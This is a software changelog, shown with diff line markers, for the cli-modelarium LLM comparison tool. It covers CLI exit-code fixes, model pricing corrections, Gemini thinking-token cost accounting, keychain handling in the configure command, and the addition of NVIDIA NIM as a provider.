**Forgetting the `batch` verb ran the filename as a prompt.** `_DefaultCommandGroup.resolve_command` catches any `UsageError` and rewrites the first bare token into a `compare` prompt, which is the documented shorthand - but it never checked whether that token was a file. `cli-modelarium eval_suite.json --models X` therefore billed a real call, sent the path to the model as the prompt, never parsed the suite, and exited 0; the same line with `batch` exits 1. Every shared flag kept it silent, and only a batch-only flag surfaced it. An existing file as the first bare token is now a `UsageError` naming both the likely fix and the escape hatch, raised before any provider is constructed - so the change removes a billed request rather than substituting a different one. There is deliberately **no extension check**: `batch` accepts only `.txt` and `.json`, so gating on the extension would narrow this to exactly the cases `batch` would have accepted anyway and leave a suite saved as `.yaml` still running silently as a prompt. The bare-prompt shorthand is unaffected - 89 test invocations and all 31 documented examples rely on it, and none names a file.
|
|
530
|
+
|
|
531
|
+
**An empty suite exited 0.** `batch` returned early on a file that parsed to no prompts, so nothing ran, no output file was written, and any `--min-pass-rate` went unapplied - and under the README's own JSON recipe stdout was 0 bytes, making a truncated suite indistinguishable from a green run. It now exits 2: there is no assertion verdict to report, and the run could not proceed, which is what the other pre-flight failures use.
|
|
532
|
+
|
|
533
|
+
**`--no-assertions` silently disarmed the gate beside it.** The CLI already rejects `--strict-assertions` with `--min-pass-rate` as ambiguous, but accepted either alongside `--no-assertions`, which skips every assertion - so failing assertions exited 0 with nothing printed to say the gate had been switched off. It now raises the same `UsageError`, before any call.
|
|
534
|
+
|
|
535
|
+
- **Four pieces of documentation asserted behaviour the code does not have.**
|
|
536
|
+
|
|
537
|
+
**The exit-code table said code `1` was `batch`-only.** It is at `README.md:362` and at line 245 in each of the eight translations. `compare` does return `1` - verified as real subprocesses on an unwritable `--output` path and on `--concurrency -1`, both as uncaught tracebacks, and the first of those is listed in the same table as a cause of code `2`. The row now says only `batch` produces an assertion *verdict* while `compare` can still exit `1` on an unexpected error, and it names the new "verified nothing" cause from this release. All nine files were edited: the parity suite's heading test matches `^#{1,3}` and `#### Exit codes` is level 4, so an edit in one language and not the others would have passed.
|
|
538
|
+
|
|
539
|
+
**The `test_used` enum was documented as five values while emitting seven.** `paired_t_test` and `wilcoxon_signed_rank` have been emitted since they were added and the comment at `run_statistics.py:195` never learned about them. It is the only place the set is written down.
|
|
540
|
+
|
|
541
|
+
**The `_emit_batch_results` docstring claimed four run-level fields "flow to ALL formatters (not just JSON)".** CSV receives one of the four; `_format_csv` has no parameter for the other three, so a significance verdict written to CSV is computed and discarded. The docstring now says what each formatter actually receives. Whether CSV *should* carry run-level fields is left open.
|
|
542
|
+
|
|
543
|
+
**`batch --include-reasoning` was a documented no-op.** The parameter appeared once, in the signature, and was never read, while `--help` advertised it. It is now rejected with a message that names where the reasoning already is and which command the flag works on. Not wired: that would put judge reasoning into markdown and CSV and falsify the privacy note in nine READMEs, which says those two do not carry it. Not silently removed: a documented flag collapsing into "no such option" is the worse message.
|
|
544
|
+
|
|
545
|
+
## [0.1.7] - 2026-08-25
|
|
546
|
+
|
|
547
|
+
### Added
|
|
548
|
+
|
|
549
|
+
- **Five models: `glm-5.3`, `grok-4.6`, `gemini-3.7-flash`, `qwen3.8-max` and `qwen3.7-flash`.** First-party verified 2026-08-20, out of band with `PRICING_AS_OF`, which stays at 2026-07-29 - the precedent set for the gpt-5.6 line at `pricing.py:52`. No group gained a member; every existing entry is byte-identical, prices included.
|
|
550
|
+
|
|
551
|
+
Three of the five carry a tier or schedule that a single rate cannot express, so each says so beside itself rather than in a note nobody reads. `grok-4.6`'s rate is the sub-200k tier, and past 200k **every** token in the request bills at the higher tier, not just the excess. `qwen3.7-flash`'s is the entry input tier to 32k, rising to 0.10/0.40 above that and 0.20/0.80 above 256k. `gemini-3.7-flash` is on a published schedule that doubles it to 1.50/7.50 on 2027-01-01; that comment records what Google's page said and when it was read, not a rate predicted to start on a date - `545640c` had to undo the opposite shape. Both Qwen figures are the Singapore column, the region `dashscope-intl.aliyuncs.com` serves.
|
|
552
|
+
|
|
553
|
+
**One number is recorded as unsettled rather than asserted.** Every DashScope row already in the registry prices cached input at exactly 20% of input, and the block declares `cached_input = Implicit-Cache read rate where offered`. The two new Qwen rows come in at 8.5% and 10%. That is what the 2026-08-20 pass recorded, and the comment beside them says plainly that whether Alibaba changed the cache rate class for these models or the older rows use a different one is not established.
|
|
554
|
+
|
|
555
|
+
- **The Z.AI block comment no longer states an entry count.** It read "its 14 entries have not changed since the date above" - true when written, false the moment `glm-5.3` landed, and guarded by nothing: no test reads `pricing.py` as text. It now says every entry checked on 2026-06-22 is unchanged and points at the per-entry dates for anything newer. `CHANGELOG.md:143` makes the same claim and is left as shipped history.
|
|
556
|
+
|
|
557
|
+
- **The nine READMEs stop enumerating which providers carry their own verification date.** The sentence said "noted beside each one in the registry" and then grouped by provider anyway, which needed an edit every time one model in a block was refreshed - and broke outright once Z.AI carried two dates. It now states the rule and names only the oldest date, so the next out-of-band verification needs no README change at all.
|
|
558
|
+
|
|
559
|
+
### Changed
|
|
560
|
+
|
|
561
|
+
- **Test key fixtures now say `NOT_A_REAL_KEY` in the body.** Prefix and length are unchanged, so every pattern and redaction rule is exercised as before. Secret scanners match on prefix plus length plus a body that looks random; the bodies no longer do. Do not make them look realistic again.
|
|
562
|
+
|
|
563
|
+
- **The judge is now asked to write its reasoning before its score, so every judge score in a judged run may move - and with it every significance verdict.** `README.md:184-185` states the rule: "The default metric is the judge `score` when judging is on, otherwise `latency_ms`." So this is not a display change. Every p-value, Cohen's d, bootstrap confidence interval and Bonferroni/Holm correction in a judged run is computed over judge scores, and a user who had "significantly better, p=0.03" against 0.1.6 may not have it after upgrading. The same flip is applied to the hallucination preset, ordered reasoning, score, risk_level.
|
|
564
|
+
|
|
565
|
+
**This is a hypothesis, not a measured result, and it is stated as one.** The mechanism - a model that emits the score first has committed to a verdict before writing the justification for it - is true by construction only for a model that emits its answer directly. It does not hold for one that reasons in a hidden trace before emitting anything, and the twelve models flagged `rejects_sampling_params` are both the likeliest judges in a panel and the likeliest to work that way. No percentage is claimed because none was measured; measuring it needs paired live runs against both templates, which this release does not contain.
|
|
566
|
+
|
|
567
|
+
**It does not confound with the four cost corrections in this same release.** The significance metric is one of `score`, `latency_ms`, `output_tokens` or `cost_usd`, so a default-metric verdict moves only because of this change and a `--significance-metric cost_usd` verdict only because of the pricing work. The two land in disjoint columns and can be attributed separately.
|
|
568
|
+
|
|
569
|
+
For the hallucination preset, `risk_level_from_score` maps 1-3 to High, 4-6 to Medium and 7-10 to Low, so a score moving 6 to 7 flips the reported category outright rather than nudging it. `hallucination.py` derives `risk_level` on the field's **absence** rather than its position, so the reorder itself is parse-safe; only a moved score changes a bucket.
|
|
570
|
+
|
|
571
|
+
The reasoning field stays "one sentence". Lengthening it is a separate change and is not made here.
|
|
572
|
+
|
|
573
|
+
- **`all-flagship` (and its alias `all-premium`) moved four of its eight slots to each provider's current top model, and the group now costs 2.2% more to run.** `gpt-5.5` → `gpt-5.6-sol`, `claude-opus-4-8` → `claude-opus-5`, `grok-4.3` → `grok-4.6`, `qwen3.7-max` → `qwen3.8-max`. Google, DeepSeek, Mistral and Z.AI keep their slots. The provider set is unchanged - openai, anthropic, google, xai, deepseek, mistral, dashscope, zai - so nobody needs a key they did not need before.
|
|
574
|
+
|
|
575
|
+
The estimate a run of the whole group produces goes from $0.050928 to $0.052053. Two of the four swaps are cost-neutral, `qwen3.8-max` is 20% cheaper than the model it replaces, and the rise is almost entirely `grok-4.6`, which is 113% dearer than `grok-4.3`. **A `--max-cost` ceiling tuned within 2.2% of the old figure will now trip.** It trips before anything is spent - the pre-flight compares the estimate and exits 2 without making a call - but the message names the estimate and the ceiling, not the fact that the group's membership changed, so a ceiling that starts failing after this upgrade is why.
|
|
576
|
+
|
|
577
|
+
**`glm-5.3` is registered but deliberately not promoted.** It was added in this release, and Z.AI's slot still holds `glm-5.2`. No published Artificial Analysis score exists for it, and a benchmark writeup found it scored exactly the same as `glm-5.2` - unmeasured is not a reason to swap, and a group whose membership moves on unmeasured claims is worse than one that stays put.
|
|
578
|
+
|
|
579
|
+
Mistral keeps `mistral-large-latest` despite scoring far below every other member. The group means each provider's top model, not a quality bar: a low score sitting next to a high one is information a comparison tool exists to show.
|
|
580
|
+
|
|
581
|
+
- **`all-premium` is now the same list object as `all-flagship` rather than a second copy of it.** They were two independent eight-element literals with identical contents and nothing in `src/` linking them, so every membership edit had to be made twice and nothing caught a miss. Both names still work and both resolve to the same eight ids; no user-visible behaviour changes. `all-flagship` is the canonical name because the group means each provider's top model rather than a price tier - `deepseek-v4-pro` is DeepSeek's flagship at 0.435 input, which nobody would call premium. The value must be the list, never the string `"all-flagship"`: `expand_group` does `list(MODEL_GROUPS.get(group, []))`, and `list()` on a string iterates characters, so an alias by string expands to twelve one-character model ids and fails with `Unknown model: a`. The comments at `models_registry.py:75-78` and `test_models_registry.py:198` record the trap.
|
|
582
|
+
|
|
583
|
+
- **`configure` stopped asking for eleven credentials on a machine with no keychain, and its panel now reports what actually happened.** With no backend available, every `save_key` raised, the loop caught it per provider and carried on, and the user typed eleven real API keys into nothing before a green "Configuration complete" panel and exit 0. `NoKeyringError` now stops the loop after reporting the reason once - a backend cannot appear between two prompts, so every remaining provider would fail identically. `KeyringError` deliberately does **not** stop it: that class covers `KeyringLocked`, `InitError` and `PasswordSetError`, and `PasswordSetError` is what KWallet raises when someone dismisses a single OS auth dialog (`kwallet.py:141`) - abandoning ten providers because a user pressed Escape once would be worse than the bug being fixed. The bare `except Exception` stays, and is load-bearing: Windows calls `win32cred.CredWrite` unwrapped, so a write failure there arrives as a `pywintypes.error` that is not a `KeyringError` at all.
|
|
584
|
+
|
|
585
|
+
- **The summary distinguishes five outcomes where it previously counted one.** `saved` was the only counter, so "1 of 11 providers configured" was byte-identical whether the other ten were skipped or rejected. Runs are now tallied as configured / skipped / invalid / not stored / not reached, and `attempted` is derived from the first three rather than counted separately so it cannot drift. Format failures and storage failures stay apart in the prose as well as the counts - a user with a locked keychain told their key was "invalid" goes and inspects a key that was never wrong. `not reached` exists because stopping early leaves providers in none of the other four buckets; a summary that omitted them would have been a new version of the same defect. The panel's colour and title follow the outcome (green / yellow / red / neutral), an interrupt gets its own "Setup cancelled" rather than rendering as success, and every line is checked against the counters it sits beside.
|
|
586
|
+
|
|
587
|
+
- **Exit code reflects the outcome.** The only non-zero condition is `attempted > 0 and configured == 0`, using the existing `EXIT_CALL_FAILED`; there is no fourth code. Partial success stays 0 - configuring the two providers you own is success, not a shortfall against the nine you do not - and so does a run where everything was skipped, which is why the guard is not `configured == 0`. An interrupt keeps exit 2 and now prints the summary, so a run cancelled after three saves says which three.
|
|
588
|
+
|
|
589
|
+
- **The `ValueError` arm of `configure` now redacts.** `cli.py`'s "Invalid format" line interpolated the exception directly; patching `save_key` to raise a `ValueError` carrying a canary put the canary verbatim on screen. It was safe only because `security.py` builds that message without the key, and nothing enforced that. `keys set` needed no change - `_print_error` already calls `redact_secrets`.
|
|
590
|
+
|
|
591
|
+
- **`configure` has tests for the first time**, which is how all of the above survived. Thirty-seven of them, including a keyring double that can raise, parametrised over every exception class reachable from a save path; the partition invariant `configured + skipped + invalid + not_stored + not_reached == len(providers)` asserted across twelve scenarios; and panel colour asserted through SGR codes. Uncertain and noted rather than assumed: no environment available to this work could exercise a real locked macOS Keychain or Secret Service, so which class a locked-but-present keychain raises per platform is read from keyring's source rather than measured. If it raises `NoKeyringError` on some platform, that platform would stop the loop where continuing would have been better.
|
|
592
|
+
|
|
593
|
+
### Fixed
|
|
594
|
+
|
|
595
|
+
- **Every judge has been shown a malformed JSON example labelled "this exact format", and a judge that copied it had its score thrown away.** `JUDGE_PROMPT_TEMPLATE` carried `{{` / `}}` escaping for `str.format`, but `build_judge_prompt` substitutes with `str.replace` and nothing anywhere unescapes the doubled braces. `.format()` is never called in `src/` at all - it survives only in two comments, one of which was the comment justifying the escaping. Rendered against the real module rather than read from the source, the prompt ended:
|
|
596
|
+
|
|
597
|
+
```
|
|
598
|
+
Respond with ONLY a JSON object in this exact format:
|
|
599
|
+
{{"score": <1-10 integer>, "reasoning": "<one sentence explanation>"}}
|
|
600
|
+
```
|
|
601
|
+
|
|
602
|
+
A reply copying that example is discarded: `parse_judge_response` returns `score=None` with `could not extract JSON object`, because the balanced-brace fallback hands `json.loads` the whole `{{...}}` string. Single braces parse and score normally, and a fenced ```` ```json ```` block containing doubled braces fails identically - the fence stripper does not rescue it. So every score this tool has ever produced came from a judge that ignored its own instructions, and any judge that followed them was silently dropped.
|
|
603
|
+
|
|
604
|
+
**The defect was invisible to reading and to the suite.** No parse-error rate is tracked, no test captured a real failure, and applying the fix to a scratch copy changed nothing: 1493 passed before, 1493 after. `TestBuildJudgePrompt` asserted criteria bulleting, substitution and injection-safety, but never the response-format example; `test_hallucination.py` pinned the instruction line and `risk_level`, but neither braces nor key order. Three tests now assert on the **rendered** prompt for both templates, which is where the defect lived - one pins that no escaped brace survives rendering, and two round-trip the example back through `json.loads` to pin that it parses and that `reasoning` comes first. They are anchored on the instruction line rather than "the first line starting with `{`", because the response is substituted above the example and a positional selector picks the wrong line once a response carries JSON of its own.
|
|
605
|
+
|
|
606
|
+
The hallucination template already used single braces and needed only the key reorder - but its example is split across two adjacent string literals, the first owning the opening brace and the second the closing one, so swapping the lines yields `}` before `{`. Both literals were rewritten, and the comment above them now says so.
|
|
607
|
+
|
|
608
|
+
- **`gemini-3.6-flash` was priced 100% high: the registry carried its 2027 rate as if it were current. Reported costs for that model now read HALF what they did.** Google's published schedule shows 0.75 / 3.75 / 0.075 through 2026-12-31 and 1.50 / 7.50 / 0.15 from 2027-01-01; the registry held the second set. A 1M-in / 1M-out run drops from $9.00 to $4.50, and every figure the tool printed for that model - the cost column, JSON, CSV, Markdown, the `pricing` command, `--max-cost` estimates and `cost_under` assertions - was twice what Google charges today. No other model's price moved; the other six Google rows were checked against the same reading and all match.
|
|
609
|
+
|
|
610
|
+
**Two Gemini corrections land in this release and they pull in opposite directions - they are not the same fix.** Counting thought tokens raised Gemini costs, because the tool had been reporting fewer tokens than were billed. This lowers `gemini-3.6-flash` specifically, because the rate itself was the 2027 one. A user comparing 0.1.6 output to 0.1.7 will see that model's cost move for both reasons at once.
|
|
611
|
+
|
|
612
|
+
This is the mirror of the `claude-sonnet-5` correction below. There the registry encoded an increase that was later cancelled; here it encoded one that had not yet taken effect. Both come from writing a future price into a field that means "current", so the comment now records what the source said and when it was read rather than what it will say - the form that survives either outcome. `gemini-3.7-flash`, registered in the same release, already carried the current figures; the two rows are identically priced on Google's page and now agree in the registry.
|
|
613
|
+
|
|
614
|
+
- **`claude-sonnet-5` was priced 50% high, and had been since 0.1.6.** The registry carried Anthropic's list price of 3.00 / 15.00 (cached 0.30) on the strength of a comment predicting that introductory pricing of 2.00 / 10.00 would end on 2026-08-31 and list pricing would take effect 2026-09-01. Anthropic has since stated the introductory rate is permanent and the increase cancelled, so the entry is now 2.00 / 10.00 (cached 0.20) - verified 2026-08-20, out of band with `PRICING_AS_OF`, following the precedent already set for the gpt-5.6 line. Every Sonnet 5 figure the tool printed - the cost column, JSON, CSV, Markdown, the `pricing` command, `--max-cost` estimates and `cost_under` assertions - was one and a half times what Anthropic charges. No other model's price moved, and `PRICING_AS_OF` is unchanged. The comment above the entry now records what Anthropic says and when that was read, rather than predicting a date: a prediction is what went wrong here, and a registry entry cannot be right about the future.
|
|
615
|
+
|
|
616
|
+
The prediction also appears in the released 0.1.5 entry below, at "`claude-opus-5` … and `claude-sonnet-5` (3.00 / 15.00 / 0.30)". That entry is left as shipped; this one corrects it.
|
|
617
|
+
|
|
618
|
+
One consequence worth knowing before it surprises you: `claude-sonnet-5`, `claude-sonnet-4-6` and `claude-sonnet-4-5` previously shared a byte-identical rate triple, so a `--significance-metric cost_usd` comparison between any two of them had zero variance and equal means, and `run_statistics` reported `test_used="trivial"` with `p_value=1.0`. With Sonnet 5 cheaper the means now differ, the same comparison takes the `zero_variance` branch, and **the p-value disappears rather than changing**. That is correct - there is no variance to compute one from - but a vanished number reads like a regression, so it is called out here rather than left to be discovered.
|
|
619
|
+
|
|
620
|
+
- **Gemini costs were understated because thinking tokens were not counted. Reported Gemini costs will now read HIGHER - Google has not raised prices; the tool was reporting less than you were billed.** `google_provider.py` read `prompt_token_count`, `candidates_token_count` and `cached_content_token_count`, and ignored `thoughts_token_count` on the same object. Google prices reasoning at the output rate - its pricing page labels that rate "Output price (including thinking tokens)" - so every Gemini model that thinks reported a cost lower than the user was charged. Measured against the live API on 2026-08-20: `gemini-3.6-flash` answering `"hi"` returned 9 output tokens and **170** thought tokens, so the reported cost was about **a twentieth** of the billed one; a longer reasoning prompt returned 206 output against 547 thought, about a third. Google thinks by default with no opt-in, so this was live for every user of such a model rather than dormant behind a flag. `gemini-3.1-flash-lite` measured zero thought tokens on the same prompts and is unchanged.
|
|
621
|
+
|
|
622
|
+
Thinking is now added to the output count rather than carried separately, which also makes Gemini consistent with the rest of the registry: OpenAI, Anthropic and Qwen all fold reasoning into their own output figure, and Google is the only one that reports it apart. `total_token_count` is used as a cross-check - anything the three known fields do not account for is folded into output rather than dropped, since understating a cost is the failure being fixed.
|
|
623
|
+
|
|
624
|
+
**Uncertain, and stated rather than implied:** two of the six registered Gemini models were measured. Which of the other four think, and by how much each was understated, is not established.
|
|
625
|
+
|
|
626
|
+
The test double is fixed as part of this, because it is why the bug survived. It built exactly the three fields the client read, so it could never surface the one the client missed; it now carries every field the SDK exposes on `GenerateContentResponseUsageMetadata`. The new tests deliberately omit `total_token_count` where they assert on thinking - with a coherent total present, the cross-check reconstructs the same number from the remainder and the test passes even when the thoughts field is ignored, which is the same can't-fail shape in a new place.
|
|
627
|
+
|
|
628
|
+
- **The nine READMEs claimed one exception to the pricing verification date; there were three, and this release makes four.** "The Z.AI/GLM prices are the one exception" had been wrong for some time: `pricing.py` also records gpt-5.6 verified 2026-08-07 by live call (`:51-54`) and the NVIDIA NIM rows verified 2026-08-15 (`:317-320`), and the Sonnet 5 correction above adds a fourth at 2026-08-20. Nothing tested the claim - the parity suite pins the *set of dates* each file states, not the word "one" - so it went stale silently in nine languages. The sentence now names the entries that carry their own date rather than counting them, which is the difference between a sentence that needs editing every time a price is verified out of band and one that needs editing only when the set changes. Prose in all nine, no new bolded date, bullet counts unchanged.
|
|
629
|
+
|
|
630
|
+
- **`keys set google` and `configure` rejected every key Google now issues.** Google's Gemini keys have moved from the `AIza...` Standard format to an `AQ.Ab...` Auth format, and the API stops accepting Standard keys in September 2026. `KEY_PATTERNS["google"]` was `^[A-Za-z0-9_-]{30,}$` - never `AIza`-specific, just a shape floor - and the dot in the new prefix was the single character failing it, so a valid Auth key was refused with "Invalid API key format for google" and exit 2. The class now admits `.`, which is exactly the `zai` class already in the table with a stricter 30-character floor; an `AIza|AQ\.Ab` alternation was deliberately not used, since it would need the dot escaped and buys no strictness the floor does not already give. Checked exhaustively over printable ASCII: `.` is the only character the widening admits, and nothing that validated before stops validating.
|
|
631
|
+
|
|
632
|
+
**Scope: this was the keychain path only.** `load_key` validates nothing, so an `AQ.Ab` key supplied through `GOOGLE_API_KEY` or `GEMINI_API_KEY` already worked, and headless and CI users were never affected. The provider client is unchanged - `GoogleProvider` hands the key to `genai.Client`, which sends it as an `x-goog-api-key` header, and that already worked with Auth keys. Verified end to end against a live Auth key: rejected before the change and accepted after, byte-identical through `save_key`/`load_key`, and a real `gemini-3.1-flash-lite` call succeeding on the key **as read back from the keychain** rather than from the environment.
|
|
633
|
+
|
|
634
|
+
The pattern had no test in either direction before this - neither `test_valid_formats` nor `test_invalid_formats` carried a google case - which is how it came to reject a whole key format silently. Both shapes are now pinned as valid, along with the 30-character floor, out-of-class characters, and the fact that the widened class equals `zai`'s.
|
|
635
|
+
|
|
636
|
+
- **The README parity suite was reporting a pass it had not earned: two of the five static-group rows were never compared against `MODEL_GROUPS`, in any of the nine files.** `_table_rows` documents itself as taking a fragment that identifies a table **header**, and its `start + 2` exists to skip that header and the separator beneath it. Its only caller passed `` `all-premium` ``, which appears in a body row - so `next()` landed on the first body row and `start + 2` skipped that row and the one after it. `all-premium`/`all-flagship` and `all-budget` were dropped from every comparison, leaving only `all-reasoning`, `all-cheap` and `all-open-weight` ever checked: 18 of 45 row-by-file pairs unverified, for as long as the table has had `all-premium` in its first body row. Reading only `row[0].split("/")[0]` discarded the second alias as well, so `all-flagship` had no coverage even once its row was reached.
|
|
637
|
+
|
|
638
|
+
A red build made it worse: `glm-5.2` belongs to three groups, so a single swap to `glm-5.3` leaves 27 stale README cells while CI reports 9 failures naming only `all-reasoning`, and correcting that one row turns the build green with `all-premium` still wrong in all nine files. `_table_rows` now matches its fragment against any line of the table and walks **back** to the separator row to find the body, so the offset no longer assumes what the match was. Anchoring on a header word is not available: every header is translated (`Group` is `Gruppe`, `Grupo`, `Groupe`, `Gruppo`, `グループ`, `그룹`, `组`), and the backticked identifiers in the body cells are the only translation-stable anchors these files have. The test now reads both aliases per cell and asserts that the documented groups equal `set(MODEL_GROUPS) - DYNAMIC_GROUPS`, replacing an `assert rows` non-emptiness check that stayed true while two of five rows were skipped. No README needed correcting - all nine documented the three groups correctly, confirmed cell by cell against `MODEL_GROUPS`, and the suite is unchanged at 1439 passed / 3 skipped.
|
|
639
|
+
|
|
640
|
+
- **`tests/test_cli_configure.py` no longer hangs where a controlling terminal is present.** `Prompt.ask(..., password=True)` reaches `getpass.getpass`, and on POSIX `unix_getpass` opens `/dev/tty` and reads from that, ignoring `sys.stdin`. All 35 tests pipe their answers through `CliRunner`, so wherever a terminal exists the first one blocks forever on a device nobody is typing into - after collection, with no output and no timeout of its own. CI is green because a runner has no controlling terminal: `/dev/tty` fails to open, `getpass` falls back to `sys.stdin`, and the piped answers arrive. A new autouse fixture in `tests/conftest.py` pins `getpass.getpass` to `getpass.fallback_getpass` so that fallback runs everywhere rather than only where the accident holds.
|
|
641
|
+
|
|
642
|
+
**The fixture does not create a coverage gap; it makes an existing one deliberate.** CI has never exercised the `/dev/tty` path - there is no terminal to exercise it with - so that branch has been uncovered for as long as these tests have existed. Pinning the fallback costs nothing that was not already lost.
|
|
643
|
+
|
|
644
|
+
**What stays uncovered is the transport, not the logic.** No test asserts that the prompt reads a terminal or suppresses echo, and after this change nothing in the suite can, by construction. What these tests were written for is untouched: the five counters and their partition, the panel title and border colour per outcome, and the `NoKeyringError`-breaks / `KeyringError`-continues split all still run, because they live in `configure`'s loop and in `_configure_summary`, not in the prompt.
|
|
645
|
+
|
|
646
|
+
`fallback_getpass` warns `GetPassWarning` itself, so pinning to it guarantees the warning rather than removing it. The 35 this raises are left visible: they mark the fallback branch as active, and suppressing them would hide the one signal that the pin is in effect. The warning's origin line moves from `getpass.py` to `rich/console.py` because `fallback_getpass` is now called directly; that is cosmetic.
|
|
647
|
+
|
|
648
|
+
**This is a test-only change; `src/` is untouched.** `configure` and `keys set` still read `/dev/tty`, so piping or redirecting a key into either still hangs wherever a terminal is present, and a key supplied on stdin is discarded. That is a separate defect, it predates this release, and it is not addressed here.
|
|
649
|
+
|
|
650
|
+
## [0.1.6] - 2026-08-15
|
|
651
|
+
|
|
652
|
+
### Added
|
|
653
|
+
|
|
654
|
+
- **NVIDIA NIM as an eleventh cloud provider, with nine models.** `NVIDIAProvider` is a thin `OpenAIProvider` subclass pointed at `https://integrate.api.nvidia.com/v1`, registered in `PROVIDER_REGISTRY` with a `KEY_PATTERNS` entry, so `keys set nvidia` / `keys delete nvidia` work and the key is read from `NVIDIA_API_KEY`. The nine: `google/gemma-4-31b-it`, `google/diffusiongemma-26b-a4b-it`, `nvidia/nemotron-3-ultra-550b-a55b`, `nvidia/llama-3.3-nemotron-super-49b-v1`, `nvidia/nemotron-mini-4b-instruct`, `mistralai/mistral-nemotron`, `minimaxai/minimax-m3`, `poolside/laguna-xs-2.1` and `meta/llama-3.1-8b-instruct`. Each was screened against all 83 chat entries in NVIDIA's catalog and then called live. Models already reachable through another provider are deliberately absent, as are any whose answer arrives only in `reasoning_content`, all multimodal ones (this tool sends no images), and one that measured 10.3s to first token against 0.2-0.9 for the rest.
|
|
655
|
+
|
|
656
|
+
- **Cost is not tracked for these nine models, and three guards silently do not apply to them.** NVIDIA publishes no per-token rate for hosted NIM - not in the API, the featured-models feed or the catalog, and independently confirmed against LiteLLM, which carries 3,020 priced entries and exactly three NIM rows, all rerank, all zero. Their `PRICING` rows carry `0.0` because that is what the schema forces, **not** because they are free.
|
|
657
|
+
|
|
658
|
+
**`--max-cost` and `cost_under` provide no protection on this provider.** `--max-cost` compares against an estimate that is identically zero, so the gate never trips - even `--max-cost 0` proceeds. A `cost_under` assertion passes on any of these models regardless of the limit, so a CI job goes green on an assertion that never meaningfully ran. `--significance-metric cost_usd` should not be trusted while one of these models is in the comparison: its cost is a constant placeholder rather than a measurement, and a comparison against a real-cost arm can report a confident, fabricated result.
|
|
659
|
+
|
|
660
|
+
**Access is credit-metered rather than per-token, so you exhaust credits rather than receive a bill.** That is a different failure mode from every other provider in the table, and it is the thing "cost is not tracked" fails to convey on its own.
|
|
661
|
+
|
|
662
|
+
A caveat panel titled **Cost not tracked** carries all three points and fires on `compare` and `batch` whenever one of these models is in a run. It renders alongside the temperature caveat rather than replacing it, and goes to stderr when a machine payload owns stdout.
|
|
663
|
+
|
|
664
|
+
**Known limitation: the cost column shows `$0.000000` for these models, which is not a price.** A later release will render it accurately. Three surfaces the panel does not reach: a NIM model used **only** as `--judge` is not in the run's model list, so no panel fires and judge cost sums silently to zero; `list-models` and `pricing --all` render `$0.0000` for these rows with no panel anywhere near them, and `pricing` is the command whose entire job is stating cost; and the **file output paths** - `--output results.md`, `.json` or `.csv` contain the rows with no caveat at all, because the panel is console text and never enters the file.
|
|
665
|
+
|
|
666
|
+
**What that warning does and does not reach.** The sentence above reaches the human who sets a pipeline up, once. It does not reach the pipeline. A scripted consumer reads JSON, and the JSON carries no pricing caveat key: `total_cost_usd` reports `0` with nothing distinguishing it from a genuinely free run, and there is no top-level key marking which models were unpriced - unlike the temperature caveat, which has `models_without_temperature` and `significance_temperature_mixed`. Until a later release adds one, an automated consumer has no signal on any surface.
|
|
667
|
+
|
|
668
|
+
- NVIDIA models are in **no group**. They are excluded from the dynamic `all` group alongside `local` and `openrouter`, and from every static group. `all` otherwise means every model whose cost can be stated; the registry already holds four duplicate-weight pairs each neutralised only because OpenRouter is excluded, so NVIDIA would be the first provider able to put a genuine duplicate there; and a run exits `2` if any cell errors, while roughly half NVIDIA's catalog was unreachable when screened and availability moves between runs.
|
|
669
|
+
- The `KEY_PATTERNS` entry closes a split-brain before it can open. `configure` iterates `all_known_providers()` with no membership gate and `validate_key()` returns True for a provider with no pattern, while `keys set` and `keys delete` both gate on `KEY_PATTERNS` membership - so a provider present in `PRICING` and absent from `KEY_PATTERNS` would let `configure` write a credential that `keys delete` then refuses to remove. A test pins the invariant as a subset (every provider in `PRICING` except `local` must have a pattern) rather than an equality, so a provider can be wired before its models are registered.
|
|
670
|
+
- `tests/test_nvidia_provider.py`, following the per-provider file precedent set by `tests/test_zai_provider.py` rather than extending `tests/test_provider_inheritance.py`, whose three hand-maintained literal lists already omit `ZAIProvider` entirely.
|
|
671
|
+
|
|
672
|
+
### Changed
|
|
673
|
+
|
|
674
|
+
- **The nine READMEs document NVIDIA NIM.** The provider count is now eleven, the supported-providers table carries an NVIDIA NIM row reading **No published rate** under cost tracking, and the *Pricing data* section records that cost is not tracked and that `--max-cost` and `cost_under` give no protection there. Translated in place in all eight non-English files.
|
|
675
|
+
|
|
676
|
+
- **The project moved to SoraVantia GK.** The repository is now at [github.com/SoraVantia/cli-modelarium](https://github.com/SoraVantia/cli-modelarium), and the copyright holder in `LICENSE` and `NOTICE` is SoraVantia GK. Cli Modelarium was created by Lavelle Hatcher Jr, who continues to maintain it - `pyproject.toml` now records SoraVantia GK as `authors` and Lavelle Hatcher Jr as `maintainers`, and PyPI renders both.
|
|
677
|
+
|
|
678
|
+
**Nothing about installing or using the tool changes.** The package is still `cli-modelarium` on PyPI, the command is still `cli-modelarium`, and the import path is still `cli_modelarium`. No code path, flag, output format or default changed.
|
|
679
|
+
|
|
680
|
+
This is not a licence change. Cli Modelarium remains under Apache License 2.0; only the copyright holder moved. Third-party attributions in `NOTICE` are untouched.
|
|
681
|
+
|
|
682
|
+
Repository links were updated across all nine READMEs, `CONTRIBUTING.md`, `SECURITY.md`, `pyproject.toml` and `.github/FUNDING.yml`. One is not documentation: the `HTTP-Referer` header the OpenRouter provider sends identifies the project by repository URL, and now carries the new one.
|
|
683
|
+
|
|
684
|
+
### Fixed
|
|
685
|
+
|
|
686
|
+
- **The privacy note now covers all three output formats.** It warned that JSON embeds the full prompt and the full model response and named `results.json` alone, which implied CSV and Markdown were safe to publish. All three carry the same content - CSV has `prompt`, `system`, `output` and `error` columns, and the Markdown report embeds both in full - and CSV is the likeliest of the three to be uploaded as a CI artifact. Corrected in all nine READMEs.
|
|
687
|
+
|
|
688
|
+
- **Repository URLs now use the lowercase repository name.** The repository is at [github.com/SoraVantia/cli-modelarium](https://github.com/SoraVantia/cli-modelarium), matching the PyPI package, the command and the import path; links written `Cli-Modelarium` were updated across the nine READMEs, `CONTRIBUTING.md`, `SECURITY.md`, `pyproject.toml`, this file and the OpenRouter `HTTP-Referer` header. The project name is unchanged - only the URL. `github.com` resolves case-insensitively, but `raw.githubusercontent.com` does not, and the two absolute asset URLs README.md carries are the ones PyPI renders.
|
|
689
|
+
|
|
690
|
+
